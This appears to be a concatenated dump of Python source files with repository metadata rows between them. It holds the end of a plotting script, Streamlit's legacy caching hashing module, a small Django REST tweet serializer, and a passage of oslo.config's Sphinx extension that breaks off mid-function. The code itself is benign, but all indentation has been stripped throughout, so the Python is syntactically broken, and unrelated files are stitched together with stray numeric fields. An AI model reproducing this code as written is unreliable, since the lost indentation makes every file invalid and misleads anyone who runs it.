xlab.set_style('italic')
xlab.set_size(10)
ylab.set_style('italic')
ylab.set_size(10)
# tweak the title
ttl = ax.title
ttl.set_weight('bold')
plt.savefig(filepath)
plt.close()
def write_report(template_filename:str, **kwargs)->None:
source_file = getsourcefile(lambda:0)
script_dir = os.path.dirname(os.path.abspath(source_file))
template = pathlib.Path(os.path.join(script_dir, template_filename)).read_text()
report = template.format(**kwargs)
outfilepath = os.path.join(kwargs['out_dir'], template_filename)
with open(outfilepath, 'w', encoding='utf-8') as f:
f.write(report)
print(f'report written to: {outfilepath}')
if __name__ == '__main__':
main()
| 41.922652
| 174
| 0.621837
|
4a11152ca545171b216d21463263b45e6ff6396e
| 35,206
|
py
|
Python
|
lib/streamlit/legacy_caching/hashing.py
|
sourcery-ai-bot/streamlit
|
cbfa69c8ec310a839148cfa4bac5697e6f392a79
|
[
"Apache-2.0"
] | null | null | null |
lib/streamlit/legacy_caching/hashing.py
|
sourcery-ai-bot/streamlit
|
cbfa69c8ec310a839148cfa4bac5697e6f392a79
|
[
"Apache-2.0"
] | null | null | null |
lib/streamlit/legacy_caching/hashing.py
|
sourcery-ai-bot/streamlit
|
cbfa69c8ec310a839148cfa4bac5697e6f392a79
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018-2022 Streamlit Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A hashing utility for code."""
import collections
import dis
import enum
import functools
import hashlib
import importlib
import inspect
import io
import os
import pickle
import sys
import tempfile
import textwrap
import threading
import typing
import weakref
from typing import Any, List, Pattern, Optional, Dict, Callable, Union
import unittest.mock
from streamlit import config
from streamlit import file_util
from streamlit import type_util
from streamlit import util
from streamlit.errors import StreamlitAPIException, MarkdownFormattedException
from streamlit.folder_black_list import FolderBlackList
from streamlit.logger import get_logger
from streamlit.uploaded_file_manager import UploadedFile
_LOGGER = get_logger(__name__)
# If a dataframe has more than this many rows, we consider it large and hash a sample.
_PANDAS_ROWS_LARGE = 100000
_PANDAS_SAMPLE_SIZE = 10000
# Similar to dataframes, we also sample large numpy arrays.
_NP_SIZE_LARGE = 1000000
_NP_SAMPLE_SIZE = 100000
# Arbitrary item to denote where we found a cycle in a hashed object.
# This allows us to hash self-referencing lists, dictionaries, etc.
_CYCLE_PLACEHOLDER = b"streamlit-57R34ML17-hesamagicalponyflyingthroughthesky-CYCLE"
# This needs to be initialized lazily to avoid calling config.get_option() and
# thus initializing config options when this file is first imported.
_FOLDER_BLACK_LIST = None
# FFI objects (objects that interface with C libraries) can be any of these types:
_FFI_TYPE_NAMES = [
"_cffi_backend.FFI",
"builtins.CompiledFFI",
]
# KERAS objects can be any of these types:
_KERAS_TYPE_NAMES = [
"keras.engine.training.Model",
"tensorflow.python.keras.engine.training.Model",
"tensorflow.python.keras.engine.functional.Functional",
]
Context = collections.namedtuple("Context", ["globals", "cells", "varnames"])
# Mapping of types or fully qualified names to hash functions. This is used to
# override the behavior of the hasher inside Streamlit's caching mechanism:
# when the hasher encounters an object, it will first check to see if its type
# matches a key in this dict and, if so, will use the provided function to
# generate a hash for it.
HashFuncsDict = Dict[Union[str, typing.Type[Any]], Callable[[Any], Any]]
class HashReason(enum.Enum):
CACHING_FUNC_ARGS = 0
CACHING_FUNC_BODY = 1
CACHING_FUNC_OUTPUT = 2
CACHING_BLOCK = 3
def update_hash(
val: Any,
hasher,
hash_reason: HashReason,
hash_source: Callable[..., Any],
context: Optional[Context] = None,
hash_funcs: Optional[HashFuncsDict] = None,
) -> None:
"""Updates a hashlib hasher with the hash of val.
This is the main entrypoint to hashing.py.
"""
hash_stacks.current.hash_reason = hash_reason
hash_stacks.current.hash_source = hash_source
ch = _CodeHasher(hash_funcs)
ch.update(hasher, val, context)
class _HashStack:
"""Stack of what has been hashed, for debug and circular reference detection.
This internally keeps 1 stack per thread.
Internally, this stores the ID of pushed objects rather than the objects
themselves because otherwise the "in" operator inside __contains__ would
fail for objects that don't return a boolean for "==" operator. For
example, arr == 10 where arr is a NumPy array returns another NumPy array.
This causes the "in" to crash since it expects a boolean.
"""
def __init__(self):
self._stack: collections.OrderedDict[int, List[Any]] = collections.OrderedDict()
# The reason why we're doing this hashing, for debug purposes.
self.hash_reason: Optional[HashReason] = None
# Either a function or a code block, depending on whether the reason is
# due to hashing part of a function (i.e. body, args, output) or an
# st.Cache codeblock.
self.hash_source: Optional[Callable[..., Any]] = None
def __repr__(self) -> str:
return util.repr_(self)
def push(self, val: Any):
self._stack[id(val)] = val
def pop(self):
self._stack.popitem()
def __contains__(self, val: Any):
return id(val) in self._stack
def pretty_print(self):
def to_str(v):
try:
return "Object of type %s: %s" % (type_util.get_fqn_type(v), str(v))
except:
return "<Unable to convert item to string>"
# IDEA: Maybe we should remove our internal "hash_funcs" from the
# stack. I'm not removing those now because even though those aren't
# useful to users I think they might be useful when we're debugging an
# issue sent by a user. So let's wait a few months and see if they're
# indeed useful...
return "\n".join(to_str(x) for x in reversed(self._stack.values()))
class _HashStacks:
"""Stacks of what has been hashed, with at most 1 stack per thread."""
def __init__(self):
self._stacks: weakref.WeakKeyDictionary[
threading.Thread, _HashStack
] = weakref.WeakKeyDictionary()
def __repr__(self) -> str:
return util.repr_(self)
@property
def current(self) -> _HashStack:
current_thread = threading.current_thread()
stack = self._stacks.get(current_thread, None)
if stack is None:
stack = _HashStack()
self._stacks[current_thread] = stack
return stack
hash_stacks = _HashStacks()
class _Cells:
"""
This is basically a dict that allows us to push/pop frames of data.
Python code objects are nested. In the following function:
@st.cache()
def func():
production = [[x + y for x in range(3)] for y in range(5)]
return production
func.__code__ is a code object, and contains (inside
func.__code__.co_consts) additional code objects for the list
comprehensions. Those objects have their own co_freevars and co_cellvars.
What we need to do as we're traversing this "tree" of code objects is to
save each code object's vars, hash it, and then restore the original vars.
"""
_cell_delete_obj = object()
def __init__(self):
self.values = {}
self.stack = []
self.frames = []
def __repr__(self) -> str:
return util.repr_(self)
def _set(self, key, value):
"""
Sets a value and saves the old value so it can be restored when
we pop the frame. A sentinel object, _cell_delete_obj, indicates that
the key was previously empty and should just be deleted.
"""
# save the old value (or mark that it didn't exist)
self.stack.append((key, self.values.get(key, self._cell_delete_obj)))
# write the new value
self.values[key] = value
def pop(self):
"""Pop off the last frame we created, and restore all the old values."""
idx = self.frames.pop()
for key, val in self.stack[idx:]:
if val is self._cell_delete_obj:
del self.values[key]
else:
self.values[key] = val
self.stack = self.stack[:idx]
def push(self, code, func=None):
"""Create a new frame, and save all of `code`'s vars into it."""
self.frames.append(len(self.stack))
for var in code.co_cellvars:
self._set(var, var)
if code.co_freevars:
if func is not None:
assert len(code.co_freevars) == len(func.__closure__)
for var, cell in zip(code.co_freevars, func.__closure__):
self._set(var, cell.cell_contents)
else:
# List comprehension code objects also have freevars, but they
# don't have a surrouding closure. In these cases we just use the name.
for var in code.co_freevars:
self._set(var, var)
def _get_context(func) -> Context:
varnames = {"self": func.__self__} if inspect.ismethod(func) else {}
return Context(globals=func.__globals__, cells=_Cells(), varnames=varnames)
def _int_to_bytes(i: int) -> bytes:
num_bytes = (i.bit_length() + 8) // 8
return i.to_bytes(num_bytes, "little", signed=True)
def _key(obj: Optional[Any]) -> Any:
"""Return key for memoization."""
if obj is None:
return None
def is_simple(obj):
return (
isinstance(obj, bytes)
or isinstance(obj, bytearray)
or isinstance(obj, str)
or isinstance(obj, float)
or isinstance(obj, int)
or isinstance(obj, bool)
or obj is None
)
if is_simple(obj):
return obj
if isinstance(obj, tuple):
if all(map(is_simple, obj)):
return obj
if isinstance(obj, list):
if all(map(is_simple, obj)):
return ("__l", tuple(obj))
if (
type_util.is_type(obj, "pandas.core.frame.DataFrame")
or type_util.is_type(obj, "numpy.ndarray")
or inspect.isbuiltin(obj)
or inspect.isroutine(obj)
or inspect.iscode(obj)
):
return id(obj)
return NoResult
class _CodeHasher:
"""A hasher that can hash code objects including dependencies."""
def __init__(self, hash_funcs: Optional[HashFuncsDict] = None):
# Can't use types as the keys in the internal _hash_funcs because
# we always remove user-written modules from memory when rerunning a
# script in order to reload it and grab the latest code changes.
# (See LocalSourcesWatcher.py:on_file_changed) This causes
# the type object to refer to different underlying class instances each run,
# so type-based comparisons fail. To solve this, we use the types converted
# to fully-qualified strings as keys in our internal dict.
self._hash_funcs: HashFuncsDict
if hash_funcs:
self._hash_funcs = {
k if isinstance(k, str) else type_util.get_fqn(k): v
for k, v in hash_funcs.items()
}
else:
self._hash_funcs = {}
self._hashes: Dict[Any, bytes] = {}
# The number of the bytes in the hash.
self.size = 0
def __repr__(self) -> str:
return util.repr_(self)
def to_bytes(self, obj: Any, context: Optional[Context] = None) -> bytes:
"""Add memoization to _to_bytes and protect against cycles in data structures."""
tname = type(obj).__qualname__.encode()
key = (tname, _key(obj))
# Memoize if possible.
if key[1] is not NoResult and key in self._hashes:
return self._hashes[key]
# Break recursive cycles.
if obj in hash_stacks.current:
return _CYCLE_PLACEHOLDER
hash_stacks.current.push(obj)
try:
# Hash the input
b = b"%s:%s" % (tname, self._to_bytes(obj, context))
# Hmmm... It's possible that the size calculation is wrong. When we
# call to_bytes inside _to_bytes things get double-counted.
self.size += sys.getsizeof(b)
if key[1] is not NoResult:
self._hashes[key] = b
except (UnhashableTypeError, UserHashError, InternalHashError):
# Re-raise exceptions we hand-raise internally.
raise
except BaseException as e:
raise InternalHashError(e, obj)
finally:
# In case an UnhashableTypeError (or other) error is thrown, clean up the
# stack so we don't get false positives in future hashing calls
hash_stacks.current.pop()
return b
def update(self, hasher, obj: Any, context: Optional[Context] = None) -> None:
"""Update the provided hasher with the hash of an object."""
b = self.to_bytes(obj, context)
hasher.update(b)
def _file_should_be_hashed(self, filename: str) -> bool:
global _FOLDER_BLACK_LIST
if not _FOLDER_BLACK_LIST:
_FOLDER_BLACK_LIST = FolderBlackList(
config.get_option("server.folderWatchBlacklist")
)
filepath = os.path.abspath(filename)
file_is_blacklisted = _FOLDER_BLACK_LIST.is_blacklisted(filepath)
# Short circuiting for performance.
if file_is_blacklisted:
return False
return file_util.file_is_in_folder_glob(
filepath, self._get_main_script_directory()
) or file_util.file_in_pythonpath(filepath)
def _to_bytes(self, obj: Any, context: Optional[Context]) -> bytes:
"""Hash objects to bytes, including code with dependencies.
Python's built in `hash` does not produce consistent results across
runs.
"""
if isinstance(obj, unittest.mock.Mock):
# Mock objects can appear to be infinitely
# deep, so we don't try to hash them at all.
return self.to_bytes(id(obj))
elif isinstance(obj, (bytes, bytearray)):
return obj
elif type_util.get_fqn_type(obj) in self._hash_funcs:
# Escape hatch for unsupported objects
hash_func = self._hash_funcs[type_util.get_fqn_type(obj)]
try:
output = hash_func(obj)
except BaseException as e:
raise UserHashError(e, obj, hash_func=hash_func)
return self.to_bytes(output)
elif isinstance(obj, str):
return obj.encode()
elif isinstance(obj, float):
return self.to_bytes(hash(obj))
elif isinstance(obj, int):
return _int_to_bytes(obj)
elif isinstance(obj, (list, tuple)):
h = hashlib.new("md5")
for item in obj:
self.update(h, item, context)
return h.digest()
elif isinstance(obj, dict):
h = hashlib.new("md5")
for item in obj.items():
self.update(h, item, context)
return h.digest()
elif obj is None:
return b"0"
elif obj is True:
return b"1"
elif obj is False:
return b"0"
elif type_util.is_type(obj, "pandas.core.frame.DataFrame") or type_util.is_type(
obj, "pandas.core.series.Series"
):
import pandas as pd
if len(obj) >= _PANDAS_ROWS_LARGE:
obj = obj.sample(n=_PANDAS_SAMPLE_SIZE, random_state=0)
try:
return b"%s" % pd.util.hash_pandas_object(obj).sum()
except TypeError:
# Use pickle if pandas cannot hash the object for example if
# it contains unhashable objects.
return b"%s" % pickle.dumps(obj, pickle.HIGHEST_PROTOCOL)
elif type_util.is_type(obj, "numpy.ndarray"):
h = hashlib.new("md5")
self.update(h, obj.shape)
if obj.size >= _NP_SIZE_LARGE:
import numpy as np
state = np.random.RandomState(0)
obj = state.choice(obj.flat, size=_NP_SAMPLE_SIZE)
self.update(h, obj.tobytes())
return h.digest()
elif inspect.isbuiltin(obj):
return bytes(obj.__name__.encode())
elif any(type_util.is_type(obj, typename) for typename in _FFI_TYPE_NAMES):
return self.to_bytes(None)
elif type_util.is_type(obj, "builtins.mappingproxy") or type_util.is_type(
obj, "builtins.dict_items"
):
return self.to_bytes(dict(obj))
elif type_util.is_type(obj, "builtins.getset_descriptor"):
return bytes(obj.__qualname__.encode())
elif isinstance(obj, UploadedFile):
# UploadedFile is a BytesIO (thus IOBase) but has a name.
# It does not have a timestamp so this must come before
# temproary files
h = hashlib.new("md5")
self.update(h, obj.name)
self.update(h, obj.tell())
self.update(h, obj.getvalue())
return h.digest()
elif hasattr(obj, "name") and isinstance(
obj, (io.IOBase, tempfile._TemporaryFileWrapper)
):
# Hash files as name + last modification date + offset.
# NB: we're using hasattr("name") to differentiate between
# on-disk and in-memory StringIO/BytesIO file representations.
# That means that this condition must come *before* the next
# condition, which just checks for StringIO/BytesIO.
h = hashlib.new("md5")
obj_name = getattr(obj, "name", "wonthappen") # Just to appease MyPy.
self.update(h, obj_name)
self.update(h, os.path.getmtime(obj_name))
self.update(h, obj.tell())
return h.digest()
elif isinstance(obj, Pattern):
return self.to_bytes([obj.pattern, obj.flags])
elif isinstance(obj, (io.StringIO, io.BytesIO)):
# Hash in-memory StringIO/BytesIO by their full contents
# and seek position.
h = hashlib.new("md5")
self.update(h, obj.tell())
self.update(h, obj.getvalue())
return h.digest()
elif any(
type_util.get_fqn(x) == "sqlalchemy.pool.base.Pool"
for x in type(obj).__bases__
):
# Get connect_args from the closure of the creator function. It includes
# arguments parsed from the URL and those passed in via `connect_args`.
# However if a custom `creator` function is passed in then we don't
# expect to get this data.
cargs = obj._creator.__closure__
cargs = [cargs[0].cell_contents, cargs[1].cell_contents] if cargs else None
# Sort kwargs since hashing dicts is sensitive to key order
if cargs:
cargs[1] = dict(
collections.OrderedDict(
sorted(cargs[1].items(), key=lambda t: t[0]) # type: ignore
)
)
reduce_data = obj.__reduce__()
# Remove thread related objects
for attr in [
"_overflow_lock",
"_pool",
"_conn",
"_fairy",
"_threadconns",
"logger",
]:
reduce_data[2].pop(attr, None)
return self.to_bytes([reduce_data, cargs])
elif type_util.is_type(obj, "sqlalchemy.engine.base.Engine"):
# Remove the url because it's overwritten by creator and connect_args
reduce_data = obj.__reduce__()
reduce_data[2].pop("url", None)
reduce_data[2].pop("logger", None)
return self.to_bytes(reduce_data)
elif type_util.is_type(obj, "numpy.ufunc"):
# For numpy.remainder, this returns remainder.
return bytes(obj.__name__.encode())
elif type_util.is_type(obj, "socket.socket"):
return self.to_bytes(id(obj))
elif any(
type_util.get_fqn(x) == "torch.nn.modules.module.Module"
for x in type(obj).__bases__
):
return self.to_bytes(id(obj))
elif type_util.is_type(obj, "tensorflow.python.client.session.Session"):
return self.to_bytes(id(obj))
elif type_util.is_type(obj, "torch.Tensor") or type_util.is_type(
obj, "torch._C._TensorBase"
):
return self.to_bytes([obj.detach().numpy(), obj.grad])
elif any(type_util.is_type(obj, typename) for typename in _KERAS_TYPE_NAMES):
return self.to_bytes(id(obj))
elif type_util.is_type(
obj,
"tensorflow.python.saved_model.load.Loader._recreate_base_user_object.<locals>._UserObject",
):
return self.to_bytes(id(obj))
elif inspect.isroutine(obj):
wrapped = getattr(obj, "__wrapped__", None)
if wrapped is not None:
# Ignore the wrapper of wrapped functions.
return self.to_bytes(wrapped)
if obj.__module__.startswith("streamlit"):
# Ignore streamlit modules even if they are in the CWD
# (e.g. during development).
return self.to_bytes("%s.%s" % (obj.__module__, obj.__name__))
h = hashlib.new("md5")
code = getattr(obj, "__code__", None)
assert code is not None
if self._file_should_be_hashed(code.co_filename):
context = _get_context(obj)
defaults = getattr(obj, "__defaults__", None)
if defaults is not None:
self.update(h, defaults, context)
h.update(self._code_to_bytes(code, context, func=obj))
else:
# Don't hash code that is not in the current working directory.
self.update(h, obj.__module__)
self.update(h, obj.__name__)
return h.digest()
elif inspect.iscode(obj):
if context is None:
raise RuntimeError("context must be defined when hashing code")
return self._code_to_bytes(obj, context)
elif inspect.ismodule(obj):
# TODO: Figure out how to best show this kind of warning to the
# user. In the meantime, show nothing. This scenario is too common,
# so the current warning is quite annoying...
# st.warning(('Streamlit does not support hashing modules. '
# 'We did not hash `%s`.') % obj.__name__)
# TODO: Hash more than just the name for internal modules.
return self.to_bytes(obj.__name__)
elif inspect.isclass(obj):
# TODO: Figure out how to best show this kind of warning to the
# user. In the meantime, show nothing. This scenario is too common,
# (e.g. in every "except" statement) so the current warning is
# quite annoying...
# st.warning(('Streamlit does not support hashing classes. '
# 'We did not hash `%s`.') % obj.__name__)
# TODO: Hash more than just the name of classes.
return self.to_bytes(obj.__name__)
elif isinstance(obj, functools.partial):
# The return value of functools.partial is not a plain function:
# it's a callable object that remembers the original function plus
# the values you pickled into it. So here we need to special-case it.
h = hashlib.new("md5")
self.update(h, obj.args)
self.update(h, obj.func)
self.update(h, obj.keywords)
return h.digest()
else:
# As a last resort, hash the output of the object's __reduce__ method
h = hashlib.new("md5")
try:
reduce_data = obj.__reduce__()
except BaseException as e:
raise UnhashableTypeError(e, obj)
for item in reduce_data:
self.update(h, item, context)
return h.digest()
def _code_to_bytes(self, code, context: Context, func=None) -> bytes:
h = hashlib.new("md5")
# Hash the bytecode.
self.update(h, code.co_code)
# Hash constants that are referenced by the bytecode but ignore names of lambdas.
consts = [
n
for n in code.co_consts
if not isinstance(n, str) or not n.endswith(".<lambda>")
]
self.update(h, consts, context)
context.cells.push(code, func=func)
for ref in get_referenced_objects(code, context):
self.update(h, ref, context)
context.cells.pop()
return h.digest()
@staticmethod
def _get_main_script_directory() -> str:
"""Get the directory of the main script."""
import __main__
import os
# This works because we set __main__.__file__ to the
# script path in ScriptRunner.
main_path = __main__.__file__
return str(os.path.dirname(main_path))
def get_referenced_objects(code, context: Context) -> List[Any]:
# Top of the stack
tos: Any = None
lineno = None
refs: List[Any] = []
def set_tos(t):
nonlocal tos
if tos is not None:
# Hash tos so we support reading multiple objects
refs.append(tos)
tos = t
# Our goal is to find referenced objects. The problem is that co_names
# does not have full qualified names in it. So if you access `foo.bar`,
# co_names has `foo` and `bar` in it but it doesn't tell us that the
# code reads `bar` of `foo`. We are going over the bytecode to resolve
# from which object an attribute is requested.
# Read more about bytecode at https://docs.python.org/3/library/dis.html
for op in dis.get_instructions(code):
try:
# Sometimes starts_line is None, in which case let's just remember the
# previous start_line (if any). This way when there's an exception we at
# least can point users somewhat near the line where the error stems from.
if op.starts_line is not None:
lineno = op.starts_line
if op.opname in ["LOAD_GLOBAL", "LOAD_NAME"]:
if op.argval in context.globals:
set_tos(context.globals[op.argval])
else:
set_tos(op.argval)
elif op.opname in ["LOAD_DEREF", "LOAD_CLOSURE"]:
set_tos(context.cells.values[op.argval])
elif op.opname == "IMPORT_NAME":
try:
set_tos(importlib.import_module(op.argval))
except ImportError:
set_tos(op.argval)
elif op.opname in ["LOAD_METHOD", "LOAD_ATTR", "IMPORT_FROM"]:
if tos is None:
refs.append(op.argval)
elif isinstance(tos, str):
tos += "." + op.argval
else:
tos = getattr(tos, op.argval)
elif op.opname == "DELETE_FAST" and tos:
del context.varnames[op.argval]
tos = None
elif op.opname == "STORE_FAST" and tos:
context.varnames[op.argval] = tos
tos = None
elif op.opname == "LOAD_FAST" and op.argval in context.varnames:
set_tos(context.varnames[op.argval])
else:
# For all other instructions, hash the current TOS.
if tos is not None:
refs.append(tos)
tos = None
except Exception as e:
raise UserHashError(e, code, lineno=lineno)
return refs
class NoResult:
"""Placeholder class for return values when None is meaningful."""
pass
class UnhashableTypeError(StreamlitAPIException):
def __init__(self, orig_exc, failed_obj):
msg = self._get_message(orig_exc, failed_obj)
super(UnhashableTypeError, self).__init__(msg)
self.with_traceback(orig_exc.__traceback__)
def _get_message(self, orig_exc, failed_obj):
args = _get_error_message_args(orig_exc, failed_obj)
# This needs to have zero indentation otherwise %(hash_stack)s will
# render incorrectly in Markdown.
return (
"""
Cannot hash object of type `%(failed_obj_type_str)s`, found in %(object_part)s
%(object_desc)s.
While caching %(object_part)s %(object_desc)s, Streamlit encountered an
object of type `%(failed_obj_type_str)s`, which it does not know how to hash.
To address this, please try helping Streamlit understand how to hash that type
by passing the `hash_funcs` argument into `@st.cache`. For example:
```
@st.cache(hash_funcs={%(failed_obj_type_str)s: my_hash_func})
def my_func(...):
...
```
If you don't know where the object of type `%(failed_obj_type_str)s` is coming
from, try looking at the hash chain below for an object that you do recognize,
then pass that to `hash_funcs` instead:
```
%(hash_stack)s
```
Please see the `hash_funcs` [documentation]
(https://docs.streamlit.io/library/advanced-features/caching#the-hash_funcs-parameter)
for more details.
"""
% args
).strip("\n")
class UserHashError(StreamlitAPIException):
def __init__(self, orig_exc, cached_func_or_code, hash_func=None, lineno=None):
self.alternate_name = type(orig_exc).__name__
if hash_func:
msg = self._get_message_from_func(orig_exc, cached_func_or_code, hash_func)
else:
msg = self._get_message_from_code(orig_exc, cached_func_or_code, lineno)
super(UserHashError, self).__init__(msg)
self.with_traceback(orig_exc.__traceback__)
def _get_message_from_func(self, orig_exc, cached_func, hash_func):
args = _get_error_message_args(orig_exc, cached_func)
if hasattr(hash_func, "__name__"):
args["hash_func_name"] = "`%s()`" % hash_func.__name__
else:
args["hash_func_name"] = "a function"
return (
"""
%(orig_exception_desc)s
This error is likely due to a bug in %(hash_func_name)s, which is a
user-defined hash function that was passed into the `@st.cache` decorator of
%(object_desc)s.
%(hash_func_name)s failed when hashing an object of type
`%(failed_obj_type_str)s`. If you don't know where that object is coming from,
try looking at the hash chain below for an object that you do recognize, then
pass that to `hash_funcs` instead:
```
%(hash_stack)s
```
If you think this is actually a Streamlit bug, please [file a bug report here.]
(https://github.com/streamlit/streamlit/issues/new/choose)
"""
% args
).strip("\n")
def _get_message_from_code(self, orig_exc: BaseException, cached_code, lineno: int):
args = _get_error_message_args(orig_exc, cached_code)
failing_lines = _get_failing_lines(cached_code, lineno)
failing_lines_str = "".join(failing_lines)
failing_lines_str = textwrap.dedent(failing_lines_str).strip("\n")
args["failing_lines_str"] = failing_lines_str
args["filename"] = cached_code.co_filename
args["lineno"] = lineno
# This needs to have zero indentation otherwise %(lines_str)s will
# render incorrectly in Markdown.
return (
"""
%(orig_exception_desc)s
Streamlit encountered an error while caching %(object_part)s %(object_desc)s.
This is likely due to a bug in `%(filename)s` near line `%(lineno)s`:
```
%(failing_lines_str)s
```
Please modify the code above to address this.
If you think this is actually a Streamlit bug, you may [file a bug report
here.] (https://github.com/streamlit/streamlit/issues/new/choose)
"""
% args
).strip("\n")
class InternalHashError(MarkdownFormattedException):
"""Exception in Streamlit hashing code (i.e. not a user error)"""
def __init__(self, orig_exc: BaseException, failed_obj: Any):
msg = self._get_message(orig_exc, failed_obj)
super(InternalHashError, self).__init__(msg)
self.with_traceback(orig_exc.__traceback__)
def _get_message(self, orig_exc: BaseException, failed_obj: Any) -> str:
args = _get_error_message_args(orig_exc, failed_obj)
# This needs to have zero indentation otherwise %(hash_stack)s will
# render incorrectly in Markdown.
return (
"""
%(orig_exception_desc)s
While caching %(object_part)s %(object_desc)s, Streamlit encountered an
object of type `%(failed_obj_type_str)s`, which it does not know how to hash.
**In this specific case, it's very likely you found a Streamlit bug so please
[file a bug report here.]
(https://github.com/streamlit/streamlit/issues/new/choose)**
In the meantime, you can try bypassing this error by registering a custom
hash function via the `hash_funcs` keyword in @st.cache(). For example:
```
@st.cache(hash_funcs={%(failed_obj_type_str)s: my_hash_func})
def my_func(...):
...
```
If you don't know where the object of type `%(failed_obj_type_str)s` is coming
from, try looking at the hash chain below for an object that you do recognize,
then pass that to `hash_funcs` instead:
```
%(hash_stack)s
```
Please see the `hash_funcs` [documentation]
(https://docs.streamlit.io/library/advanced-features/caching#the-hash_funcs-parameter)
for more details.
"""
% args
).strip("\n")
def _get_error_message_args(orig_exc: BaseException, failed_obj: Any) -> Dict[str, Any]:
hash_reason = hash_stacks.current.hash_reason
hash_source = hash_stacks.current.hash_source
failed_obj_type_str = type_util.get_fqn_type(failed_obj)
if hash_source is None or hash_reason is None:
object_desc = "something"
object_part = ""
additional_explanation = ""
elif hash_reason is HashReason.CACHING_BLOCK:
object_desc = "a code block"
object_part = ""
additional_explanation = ""
else:
if hasattr(hash_source, "__name__"):
object_desc = "`%s()`" % hash_source.__name__
object_desc_specific = object_desc
else:
object_desc = "a function"
object_desc_specific = "that function"
if hash_reason is HashReason.CACHING_FUNC_ARGS:
object_part = "the arguments of"
elif hash_reason is HashReason.CACHING_FUNC_BODY:
object_part = "the body of"
elif hash_reason is HashReason.CACHING_FUNC_OUTPUT:
object_part = "the return value of"
return {
"orig_exception_desc": str(orig_exc),
"failed_obj_type_str": failed_obj_type_str,
"hash_stack": hash_stacks.current.pretty_print(),
"object_desc": object_desc,
"object_part": object_part,
}
def _get_failing_lines(code, lineno: int) -> List[str]:
"""Get list of strings (lines of code) from lineno to lineno+3.
Ideally we'd return the exact line where the error took place, but there
are reasons why this is not possible without a lot of work, including
playing with the AST. So for now we're returning 3 lines near where
the error took place.
"""
source_lines, source_lineno = inspect.getsourcelines(code)
start = lineno - source_lineno
end = min(start + 3, len(source_lines))
return source_lines[start:end]
| 34.754195
| 104
| 0.624354
|
4a1115a86af9b4d937d0f783a2f3f934bf1771c5
| 189
|
py
|
Python
|
twitter/tweets/serializers.py
|
yasminhillis/twitter-clone-django-react
|
c4027ed3f9a738c4cf123f735c4a78b1eb4a9245
|
[
"MIT"
] | 1
|
2020-12-21T14:42:17.000Z
|
2020-12-21T14:42:17.000Z
|
twitter/tweets/serializers.py
|
yasminhillis/twitter-clone-django-react
|
c4027ed3f9a738c4cf123f735c4a78b1eb4a9245
|
[
"MIT"
] | null | null | null |
twitter/tweets/serializers.py
|
yasminhillis/twitter-clone-django-react
|
c4027ed3f9a738c4cf123f735c4a78b1eb4a9245
|
[
"MIT"
] | null | null | null |
from rest_framework import serializers
from tweets.models import Tweet
class TweetSerializer(serializers.ModelSerializer):
class Meta:
model = Tweet
fields = '__all__'
| 27
| 51
| 0.740741
|
4a1116335dd065f4ae6dc2605dc2937bbf408ff2
| 17,620
|
py
|
Python
|
Lib/site-packages/oslo_config/sphinxext.py
|
raghulnarayanasami/python
|
5caa6317458275ef3afbf3e16bef396b0f3c27b9
|
[
"bzip2-1.0.6"
] | null | null | null |
Lib/site-packages/oslo_config/sphinxext.py
|
raghulnarayanasami/python
|
5caa6317458275ef3afbf3e16bef396b0f3c27b9
|
[
"bzip2-1.0.6"
] | null | null | null |
Lib/site-packages/oslo_config/sphinxext.py
|
raghulnarayanasami/python
|
5caa6317458275ef3afbf3e16bef396b0f3c27b9
|
[
"bzip2-1.0.6"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from docutils import nodes
from docutils.parsers import rst
from docutils.parsers.rst import directives
from docutils.statemachine import ViewList
import oslo_i18n
from sphinx import addnodes
from sphinx.directives import ObjectDescription
from sphinx.domains import Domain
from sphinx.domains import ObjType
from sphinx.roles import XRefRole
from sphinx.util import logging
from sphinx.util.nodes import make_refnode
from sphinx.util.nodes import nested_parse_with_titles
from oslo_config import cfg
from oslo_config import generator
LOG = logging.getLogger(__name__)
def _list_table(headers, data, title='', columns=None):
"""Build a list-table directive.
:param add: Function to add one row to output.
:param headers: List of header values.
:param data: Iterable of row data, yielding lists or tuples with rows.
"""
yield '.. list-table:: %s' % title
yield ' :header-rows: 1'
if columns:
yield ' :widths: %s' % (','.join(str(c) for c in columns))
yield ''
yield ' - * %s' % headers[0]
for h in headers[1:]:
yield ' * %s' % h
for row in data:
yield ' - * %s' % row[0]
for r in row[1:]:
yield ' * %s' % r
def _indent(text, n=2):
padding = ' ' * n
# we don't want to indent blank lines so just output them as-is
return '\n'.join(padding + x if x else '' for x in text.splitlines())
def _make_anchor_target(group_name, option_name):
# We need to ensure this is unique across entire documentation
# http://www.sphinx-doc.org/en/stable/markup/inline.html#ref-role
target = '%s.%s' % (cfg._normalize_group_name(group_name),
option_name.lower())
return target
_TYPE_DESCRIPTIONS = {
cfg.StrOpt: 'string',
cfg.BoolOpt: 'boolean',
cfg.IntOpt: 'integer',
cfg.FloatOpt: 'floating point',
cfg.ListOpt: 'list',
cfg.DictOpt: 'dict',
cfg.MultiStrOpt: 'multi-valued',
cfg.IPOpt: 'ip address',
cfg.PortOpt: 'port number',
cfg.HostnameOpt: 'hostname',
cfg.URIOpt: 'URI',
cfg.HostAddressOpt: 'host address',
cfg._ConfigFileOpt: 'list of filenames',
cfg._ConfigDirOpt: 'list of directory names',
}
def _get_choice_text(choice):
if choice is None:
return '<None>'
elif choice == '':
return "''"
return str(choice)
def _format_opt(opt, group_name):
opt_type = _TYPE_DESCRIPTIONS.get(type(opt),
'unknown type')
yield '.. oslo.config:option:: %s' % opt.dest
yield ''
yield _indent(':Type: %s' % opt_type)
for default in generator._format_defaults(opt):
if default:
yield _indent(':Default: ``%s``' % default)
else:
yield _indent(':Default: ``%r``' % default)
if getattr(opt.type, 'min', None) is not None:
yield _indent(':Minimum Value: %s' % opt.type.min)
if getattr(opt.type, 'max', None) is not None:
